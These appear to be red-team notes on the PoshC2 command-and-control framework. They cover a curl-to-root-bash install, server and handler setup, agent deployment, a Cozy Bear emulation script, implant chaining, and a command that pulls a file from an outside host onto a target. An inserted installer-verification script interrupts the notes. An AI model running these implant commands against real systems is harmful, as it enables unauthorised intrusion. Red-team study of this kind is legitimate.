C2 Matrix

PoshC2


Last updated 4 years ago

PoshC2 is pretty well documented; below are my notes. It is best to use the official documentation:

Demo of PoshC2 is in this and event:

Install PoshC2

sudo su -
curl -sSL https://raw.githubusercontent.com/nettitude/PoshC2/master/Install.sh | bash
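The one-liner above runs whatever the master branch serves at that moment as root, and a dropped connection can leave bash executing a truncated script. The following is an added example, not part of the original notes or the PoshC2 project: it downloads the installer to a file, compares it against a SHA-256 digest you recorded after reading the script, and only then runs it. The function names are hypothetical, and the expected digest is a value you supply yourself.

```shell
#!/bin/sh
# Added example: download, verify, then run, instead of piping curl into a root shell.
# INSTALL_URL is the URL from the notes above; the function names are hypothetical.
INSTALL_URL='https://raw.githubusercontent.com/nettitude/PoshC2/master/Install.sh'

# sha256_of FILE: print the hex SHA-256 digest of FILE.
sha256_of() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | awk '{print $1}'
    else
        shasum -a 256 "$1" | awk '{print $1}'
    fi
}

# verify_installer FILE EXPECTED_SHA256: succeed only if FILE is non-empty
# and its digest equals the one recorded when the script was reviewed.
verify_installer() {
    file=$1
    expected=$(printf '%s' "$2" | tr 'A-F' 'a-f')
    [ -s "$file" ] || { echo "empty or missing: $file" >&2; return 1; }
    actual=$(sha256_of "$file") || return 1
    [ "$actual" = "$expected" ] || {
        echo "digest mismatch for $file: got $actual" >&2
        return 1
    }
}

# fetch_installer DEST: HTTPS only; -f turns an HTTP error page into a failure
# instead of saving it as if it were the script.
fetch_installer() {
    curl -fsSL --proto '=https' --tlsv1.2 -o "$1" "$INSTALL_URL"
}

# install_poshc2 EXPECTED_SHA256: run the installer only after it verifies.
install_poshc2() {
    tmp=$(mktemp) || return 1
    fetch_installer "$tmp" && verify_installer "$tmp" "$1" && sudo bash "$tmp"
    rc=$?
    rm -f "$tmp"
    return $rc
}
```

Source the file and call `install_poshc2` with the digest you recorded; a mismatch means the script changed upstream since your review and should be read again before it runs.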

Configure and Run PoshC2

sudo su -
cd /opt/PoshC2
posh-project -n test
posh-config

Modify the values in the config file; in particular, consider BindIP, PayloadCommsHost and UserAgent.

Launch Server

sudo su -
posh-server

On launch, PoshC2 generates a number of payloads into /opt/PoshC2_Project and creates a quick start file.

cat /opt/PoshC2_Project/quickstart.txt

Launch Handler

sudo su -
posh -u georgy

Deploy Agent

Use any of the multitude of deployment methods listed in the quickstart.txt file to deploy the agent.

Emulate TTPs

Run PowerShell Scripts

loadmodule /home/slingshot/CozyBear/stepTwelve.ps1
detectav
software

Chaining

Run the following command from the implant you want to use as the daisy server.

startdaisy

Download a file

web-upload-file -from 'https://mint.scythedemo.com/ServiceLogin?passive=Gc5H5HZdakKD8ZWuaUcX2Q&b=true' -to 'C:\Users\Jorge\Desktop\scythe.dll'

Other Resources

https://redteaming.co.uk/2020/06/26/poshc2-shellcode-and-binary-patching/
https://yaksas.in/ycscblog/poshc2-a-red-teamers-notes/
https://poshc2.readthedocs.io/en/latest/
Red Team Village
Texas Cyber Summit
June'gle